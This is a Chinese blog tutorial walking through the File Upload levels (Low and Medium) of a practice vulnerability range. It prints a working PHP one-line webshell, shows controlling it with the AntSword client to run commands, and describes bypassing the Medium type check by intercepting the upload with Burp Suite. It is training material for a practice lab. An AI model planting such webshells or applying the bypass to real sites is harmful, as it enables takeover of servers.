📖 前言:文件上传漏洞是由于对上传文件未作过滤或过滤机制不严(文件后缀或类型),导致恶意用户可以上传脚本文件,通过上传文件可达到控制网站权限的目的。
目录
- 🕒 1. Low
- 🕒 2. Medium
🕒 1. Low
满足这三个条件,攻击者就能够成功入侵
- 木马上传成功,未被杀;
- 知道木马的路径在哪;
- 上传的木马能正常运行(解析)。
没有任何限制,所以直接上传一句简短代码(一句话木马)即可
<?php @eval($_POST['csb']);
echo "vulnerable";
?>
接下来需要用到一款Shell控制工具——中国蚁剑
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。简而言之,中国蚁剑是一款的shell控制端软件。
🔎 中国蚁剑
第一次安装项目需要先初始化,我们解压到下面的文件夹
AntSword-Loader-v4.0.3-win32-x64\antSword-master
初始化完成后打开,首先右键空白处,点击添加数据
将上传的URL添加进去
http://192.168.31.57:8080/hackable/uploads/webshell.php
密码就是刚才后门的密码:csb,测试连接成功后即可添加
双击该URL地址,可以看到起其目录文件信息,随后右键在此处打开终端
此时就可以随意输入指令,实现远控了。
🕒 2. Medium
可以看到,靶场对文件类型做了限制,只允许上传png、jpeg
此时我们可以把一句话木马改为png后缀
然后使用BP抓包,将文件后缀改成php
使用webshell连接同上。
OK,以上就是本期知识点“File Upload(文件上传)”的知识啦~~ ,感谢友友们的阅读。后续还会继续更新,欢迎持续关注哟📌~
💫如果有错误❌,欢迎批评指正呀👀~让我们一起相互进步🚀
🎉如果觉得收获满满,可以点点赞👍支持一下哟~
❗ 转载请注明出处
作者:HinsCoder
博客链接:🔎 作者博客主页